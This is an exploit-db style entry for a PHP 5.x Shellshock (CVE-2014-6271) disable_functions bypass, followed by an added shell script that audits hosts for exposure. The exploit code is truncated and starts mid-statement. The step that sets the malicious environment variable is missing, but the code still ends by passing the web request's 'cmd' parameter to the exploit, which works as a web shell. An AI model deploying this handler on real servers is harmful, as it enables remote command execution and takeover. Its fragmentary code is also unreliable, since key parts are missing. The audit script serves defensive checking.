# Exploit Title: PHP 5.x Shellshock Exploit (bypass disable_functions)
# Google Dork: none
# Date: 10/31/2014
# Exploit Author: Ryan King (Starfall)
# Vendor Homepage: http://php.net
# Software Link: http://php.net/get/php-5.6.2.tar.bz2/from/a/mirror
# Version: 5.* (tested on 5.6.2)
# Tested on: Debian 7 and CentOS 5 and 6
# CVE: CVE-2014-6271

$tmp 2>&1");
      // In Safe Mode, the user may only alter environment variables whose names
      // begin with the prefixes supplied by this directive.
      // By default, users will only be able to set environment variables that
      // begin with PHP_ (e.g. PHP_FOO=BAR). Note: if this directive is empty,
      // PHP will let the user modify ANY environment variable!
      mail("[email protected]","","","","-bv"); // -bv so we don't actually send any mail
   }
   else return "Not vuln (not bash)";
   $output = @file_get_contents($tmp);
   @unlink($tmp);
   if($output != "") return $output;
   else return "No output, or not vuln.";
}
shellshock($_REQUEST["cmd"]);
?>
source: http://www.exploit-db.com/exploits/35146/
Article source: lcx.cc: PHP 5.x - Bypass Disable Functions (via Shellshock)
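A host-side audit for the conditions this entry depends on, as an added example that is not part of the original exploit-db post: it reports whether mail() and an environment-setting call are still reachable while /bin/sh is bash. The function names is_disabled and assess are hypothetical, and the use of putenv() to set the variable is an assumption drawn from the fragment's comment about user-alterable environment variables.

```shell
#!/bin/sh
# Added audit example; not code from the original entry or from PHP itself.
# Inputs are passed as arguments so the logic can be checked on constructed values.

# Succeeds if function name $2 is listed in the disable_functions value $1
# (comma-separated, optional spaces, case-insensitive like PHP function names).
is_disabled() {
    list=$(printf '%s' "$1" | tr -d ' \t' | tr '[:upper:]' '[:lower:]')
    case ",$list," in
        *",$2,"*) return 0 ;;
    esac
    return 1
}

# Prints one verdict for a host, given:
#   $1 = disable_functions value from the php.ini in effect
#   $2 = basename of the binary /bin/sh resolves to (bash, dash, ...)
assess() {
    if [ "$2" != "bash" ]; then
        echo "not exposed: /bin/sh is $2, not bash"
    elif is_disabled "$1" mail; then
        echo "route closed: mail() is disabled"
    elif is_disabled "$1" putenv; then
        echo "route closed: putenv() is disabled (assumed setter)"
    else
        echo "exposed: mail() and putenv() callable with bash as /bin/sh; patch bash for CVE-2014-6271"
    fi
}

# Live check of the current host: sh audit.sh --live
if [ "${1:-}" = "--live" ]; then
    df=$(php -r 'echo ini_get("disable_functions");')
    sh_name=$(basename "$(readlink -f /bin/sh)")
    assess "$df" "$sh_name"
fi
```

The --live path reads the CLI php.ini, which can differ from the one the web SAPI loads; when they differ, pass the web server's disable_functions value to assess directly. A "route closed" verdict covers only this entry's path, so an unpatched bash still needs the CVE-2014-6271 fix.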